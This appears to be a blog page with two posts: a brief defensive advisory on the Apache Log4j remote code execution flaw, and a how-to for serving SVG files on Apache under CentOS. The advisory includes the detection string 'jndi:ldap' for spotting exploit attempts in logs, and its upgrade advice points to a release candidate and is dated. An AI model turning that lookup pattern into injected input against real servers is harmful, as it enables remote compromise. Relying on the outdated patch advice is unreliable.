Apache

by

Apache Log4j Zero-Day Vulnerability

Taken from https://www.lunasec.io/docs/blog/log4j-zero-day/

What is Apache Log4j Zero-Day Vulnerability?

Apache Log4j has a serious unauthenticated Remote Code Execution (RCE) vulnerability which was just disclosed. The exploit code for this has also been released, and the vulnerability is actively exploited in the wild. By crafting a special string that is passed to the application/service log via Log4j, attackers can execute arbitrary code loaded from remote servers. This can potentially lead to a complete compromise of the server.

What versions are vulnerable?

Any software using Apache Log4j (as a component) version between 2.0 and 2.14.1, inclusive.

What do I need to do?

A. Servers running custom Java application/services

  1. If your Log4j version is vulnerable, install the latest patched version log4j-2.15.0-rc2 available on GitHub at https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2.

B. Servers running Commercial off-the-shelf (COTS) products

  1. Plese refer to https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 for a list of advisories from the major vendors and follow the advisory.

How can I check if I have been hacked/compromised?

Check your applications’ log files for strings resembling “jndi:ldap”.

For more information

See https://www.lunasec.io/docs/blog/log4j-zero-day/

by

Adding SVG MIME Type to Apache on CentOS

What is MIME?

According to www.w3.org/services/svg-server

MIME Types
(sometimes referred to as “Internet media types”) are the primary method to
indicate the type of resources delivered via MIME-aware protocols such as HTTP
and email. User agents (such as browsers) use media types to determine whether
that user agent supports that specific format, and how the content should be
processed. When an SVG document is not served with the correct MIME Type in the
Content-Type header, it might not work as intended by the author; for example,
a browser might render the SVG document as plain text or provide a “save-as”
dialog instead of rendering the image.

Step 1: To add SVG MIME as list of supported MIME Type, simply add these lines to your /etc/httpd/conf/httpd.conf. I have placed it at around line 786

#
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
#AddType application/x-tar .tgz
AddType image/svg+xml svg svgz
AddEncoding gzip svg

Step 2: One more thing do ensure you have the following line at your /etc/mime.type

image/svg+xml svg svgz

Step 3. Remember to restart the Apache

# service httpd restart

Step 4: Test the SVG with a sample script. It should show up on your web server